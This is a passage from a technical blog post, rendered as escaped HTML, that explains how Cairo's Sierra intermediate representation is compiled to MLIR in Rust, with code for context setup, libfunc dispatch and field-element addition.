&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; The parameter types and return types.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub signature: FunctionSignature,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; The parameters of the function.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub params: Vec&amp;lt;Param&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; The statement id where the function starts.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub entry_point: StatementId,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;how-does-one-use-mlir&quot;&gt;How (does one use MLIR)?&lt;&#x2F;h2&gt;
&lt;p&gt;In our application context, the Cairo &amp;amp; StarkNet software stack, most of the code is transitioning to, or being developed in, Rust, so we would like to integrate seamlessly with this language.&lt;&#x2F;p&gt;
&lt;p&gt;MLIR has a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;mlir.llvm.org&#x2F;docs&#x2F;CAPI&#x2F;&quot;&gt;C-compatible API&lt;&#x2F;a&gt;, which can be easily interfaced with.&lt;br &#x2F;&gt;
&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;crates.io&#x2F;crates&#x2F;mlir-sys&quot;&gt;mlir-sys&lt;&#x2F;a&gt; provides auto-generated bindings to this interface, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;crates.io&#x2F;crates&#x2F;melior-next&quot;&gt;melior&lt;&#x2F;a&gt; provides a somewhat more idiomatic wrapper around it.&lt;&#x2F;p&gt;
&lt;p&gt;MLIR as a library is part of the LLVM distribution, so if you have the latest LLVM as a system library, you will have access to MLIR.&lt;&#x2F;p&gt;
&lt;p&gt;Our project resides at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;cairo_sierra2mlir&quot;&gt;&lt;code&gt;github.com&#x2F;lambdaclass&#x2F;cairo_sierra2mlir&lt;&#x2F;code&gt;&lt;&#x2F;a&gt;.&lt;br &#x2F;&gt;
You can find detailed setup instructions there that should leave you with a working development environment. When developing on Apple hardware, if you don’t want to compile your own LLVM, the brew-provided system libraries are fine.&lt;&#x2F;p&gt;
&lt;p&gt;Our first task is to parse the provided Sierra program.&lt;br &#x2F;&gt;
Fortunately, the Cairo compiler libraries provide excellent functionality:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cairo_lang_sierra::ProgramParser::new()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .parse(fs::read_to_string(input).unwrap().as_str())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .unwrap(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Once we have the Sierra representation in memory, we can start the translation process.&lt;br &#x2F;&gt;
Here is a high-level overview:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;stateDiagram-v2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    direction LR&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Load sierra program&amp;quot; as Sierra&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Initialize compiler&amp;quot; as init&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Initialize execution engine&amp;quot; as engine&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state if_skip_jit &amp;lt;&amp;lt;choice&amp;gt;&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Load MLIR dialects&amp;quot; as dialects&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Create built-in module&amp;quot; as module&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Create libc wrappers&amp;quot; as libc&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Process Types&amp;quot; as types&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Process Library functions&amp;quot; as libfuncs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Save non-flow function info&amp;quot; as func_info&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Process functions&amp;quot; as funcs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Calculate block ranges per function&amp;quot; as blocks&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Process statements&amp;quot; as statements&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state &amp;quot;Apply MLIR passes&amp;quot; as passes&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [*] --&amp;gt; Initialize&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state Initialize {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        sierra --&amp;gt; init&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        init --&amp;gt; if_skip_jit&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if_skip_jit --&amp;gt; engine: if JIT&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if_skip_jit --&amp;gt; dialects: if Compile&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        engine --&amp;gt; dialects&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Initialize --&amp;gt; Compile&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    state Compile {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        module --&amp;gt; libc&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        libc --&amp;gt; types&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        types --&amp;gt; libfuncs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        types --&amp;gt; func_info&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        func_info --&amp;gt; libfuncs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        libfuncs --&amp;gt; funcs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        funcs --&amp;gt; blocks&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        blocks --&amp;gt; statements&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Compile --&amp;gt; passes&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    passes --&amp;gt; Output&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Output --&amp;gt; [*]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The first step is initializing our machinery.&lt;br &#x2F;&gt;
We need to create a dialect registry and a context, and register the dialects. A context contains IR, dialects, and passes, and owns various objects such as types, locations, and dialect instances.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let registry = dialect::Registry::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;register_all_dialects(&amp;amp;registry);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let context = Context::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;context.append_dialect_registry(&amp;amp;registry);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;context.load_all_available_dialects();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;register_all_llvm_translations(&amp;amp;context);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We also need to create a region with a block for the builtin module:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let location = Location::unknown(&amp;amp;context);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let region = Region::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let block = Block::new(&amp;amp;[]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;region.append_block(block);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let module_op = operation::Builder::new(&amp;quot;builtin.module&amp;quot;, location)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .add_regions(vec![region])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .build();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let module = Module::from_operation(module_op).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Once initialization is done, we can start converting by processing, in sequence: types, libfuncs, functions, and statements. We won’t go into full detail, but we can look at an instructive example short enough to inspect its whole transformation process: a program performing addition and subtraction of field elements, which shows how libfuncs are processed.&lt;&#x2F;p&gt;
&lt;p&gt;For every function declaration in the libfunc declaration section of our Sierra program, the libfunc name will be matched, and the execution of compilation will be dispatched to the appropriate Rust function.&lt;&#x2F;p&gt;
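&lt;p&gt;A minimal sketch of that dispatch, with invented handler names standing in for the real compilation routines (the actual compiler matches many more libfuncs and emits MLIR rather than returning strings):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Hypothetical sketch of the per-libfunc dispatch; handler names are illustrative.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn process_libfunc(name: &amp;amp;str) -&amp;gt; Result&amp;lt;&amp;amp;&amp;#39;static str, String&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    match name {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;quot;felt252_add&amp;quot; =&amp;gt; Ok(&amp;quot;create_libfunc_felt_add&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;quot;felt252_sub&amp;quot; =&amp;gt; Ok(&amp;quot;create_libfunc_felt_sub&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        other =&amp;gt; Err(format!(&amp;quot;unimplemented libfunc: {other}&amp;quot;)),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;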
&lt;p&gt;This simple function takes a Felt (a 252-bit field element) and returns a tuple with two values:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn something(a: felt252) -&amp;gt; (felt252, felt252) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (a + 2, a - 2)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The cairo compiler outputs the following Sierra:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;type felt252 = felt252;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;type Tuple&amp;lt;felt252, felt252&amp;gt; = Struct&amp;lt;ut@Tuple, felt252, felt252&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;libfunc felt252_const&amp;lt;2&amp;gt; = felt252_const&amp;lt;2&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;libfunc dup&amp;lt;felt252&amp;gt; = dup&amp;lt;felt252&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;libfunc felt252_add = felt252_add;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;libfunc felt252_sub = felt252_sub;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;libfunc struct_construct&amp;lt;Tuple&amp;lt;felt252, felt252&amp;gt;&amp;gt; = struct_construct&amp;lt;Tuple&amp;lt;felt252, felt252&amp;gt;&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;libfunc store_temp&amp;lt;Tuple&amp;lt;felt252, felt252&amp;gt;&amp;gt; = store_temp&amp;lt;Tuple&amp;lt;felt252, felt252&amp;gt;&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;felt252_const&amp;lt;2&amp;gt;() -&amp;gt; ([1]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;dup&amp;lt;felt252&amp;gt;([0]) -&amp;gt; ([0], [3]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;felt252_add([3], [1]) -&amp;gt; ([2]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;felt252_const&amp;lt;2&amp;gt;() -&amp;gt; ([4]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;felt252_sub([0], [4]) -&amp;gt; ([5]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;struct_construct&amp;lt;Tuple&amp;lt;felt252, felt252&amp;gt;&amp;gt;([2], [5]) -&amp;gt; ([6]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;store_temp&amp;lt;Tuple&amp;lt;felt252, felt252&amp;gt;&amp;gt;([6]) -&amp;gt; ([7]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;return([7]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;simple::simple::something@0([0]: felt252) -&amp;gt; (Tuple&amp;lt;felt252, felt252&amp;gt;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Despite being quite low-level, it is still readable:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * declare a felt constant with value 2 into memory cell 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * duplicate the value in memory cell 0 into cell 3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * add the value in the memory cell 1 to the one in cell 3 and put the result in cell 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * declare a felt constant with value 2 into memory cell 4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * subtract the value in the memory cell 4 from the value in cell 0, and put the result in cell 5&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * construct a tuple of type `&amp;lt;felt252, felt252&amp;gt;` with values from cells 2 and 5, and put it in cell 6&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * store this value in cell 7 in preparation for returning it&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * return the value in cell 7&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
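&lt;p&gt;Those steps can be emulated in plain Rust with an explicit “memory cell” array. This is a hypothetical illustration: a toy prime stands in for the 252-bit one, and the tuple is returned directly instead of occupying cells 6 and 7:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Hypothetical emulation of the Sierra statements above.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;const PRIME: u64 = 17; &#x2F;&#x2F; toy stand-in for the 252-bit prime&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn something(a: u64) -&amp;gt; (u64, u64) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut cell = [0u64; 6];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    cell[0] = a;                                   &#x2F;&#x2F; function argument&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    cell[1] = 2;                                   &#x2F;&#x2F; felt252_const&amp;lt;2&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    cell[3] = cell[0];                             &#x2F;&#x2F; dup&amp;lt;felt252&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    cell[2] = (cell[3] + cell[1]) % PRIME;         &#x2F;&#x2F; felt252_add&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    cell[4] = 2;                                   &#x2F;&#x2F; felt252_const&amp;lt;2&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    cell[5] = (cell[0] + PRIME - cell[4]) % PRIME; &#x2F;&#x2F; felt252_sub&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (cell[2], cell[5])                             &#x2F;&#x2F; struct_construct + return&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;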
&lt;p&gt;The meat in this simple example is the “&lt;code&gt;felt252_add&lt;&#x2F;code&gt;” libfunc, which implements addition for field elements.&lt;br &#x2F;&gt;
Let’s see how this is implemented in our MLIR dialect:&lt;&#x2F;p&gt;
&lt;p&gt;We’ll need a region with several blocks: one in which the calculation occurs, another in which we’ll wrap and return results greater than or equal to the field prime, and another for returning results less than the field prime.&lt;br &#x2F;&gt;
We obtain the arguments, perform the addition, and check the result against the field prime.&lt;&#x2F;p&gt;
&lt;p&gt;This condition is represented by the &lt;code&gt;op_cond_br&lt;&#x2F;code&gt; conditional branch operation from the MLIR &lt;code&gt;cf&lt;&#x2F;code&gt; dialect, which&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;… contains low-level, i.e., non-region-based, control flow constructs.&lt;br &#x2F;&gt;
These constructs generally represent control flow directly on SSA blocks of a control flow graph.&lt;br &#x2F;&gt;
The cond_br terminator operation represents a conditional branch on a boolean (1-bit integer) value. If the bit is set, then the first destination is jumped to; if it is false, the second destination is chosen.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;In our case, due to how addition works in the field, if the result is greater than or equal to the field prime, we can simply subtract the prime value to wrap around. In other words, if the result is greater than or equal to the prime, jump to the &lt;code&gt;gte_prime_block&lt;&#x2F;code&gt; or “greater than or equal to the prime” block, and if not, jump to the &lt;code&gt;in_range_block&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
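&lt;p&gt;The wrap-around logic itself can be sketched in plain Rust. The real prime is 252 bits and does not fit in a machine integer, so this toy version uses &lt;code&gt;u64&lt;&#x2F;code&gt; and a small stand-in prime:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Toy stand-in for the 252-bit Stark prime.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;const PRIME: u64 = 17;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Same shape as the generated blocks: add, compare, wrap once.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn felt_add(lhs: u64, rhs: u64) -&amp;gt; u64 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let res = lhs + rhs;  &#x2F;&#x2F; arith.addi&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if res &amp;gt;= PRIME {     &#x2F;&#x2F; arith.cmpi uge + cf.cond_br&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        res - PRIME       &#x2F;&#x2F; gte_prime_block: subtract to wrap&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        res               &#x2F;&#x2F; in_range_block&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;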
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn create_libfunc_felt_add(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;&amp;#39;ctx self,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        func_decl: &amp;amp;LibfuncDeclaration,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
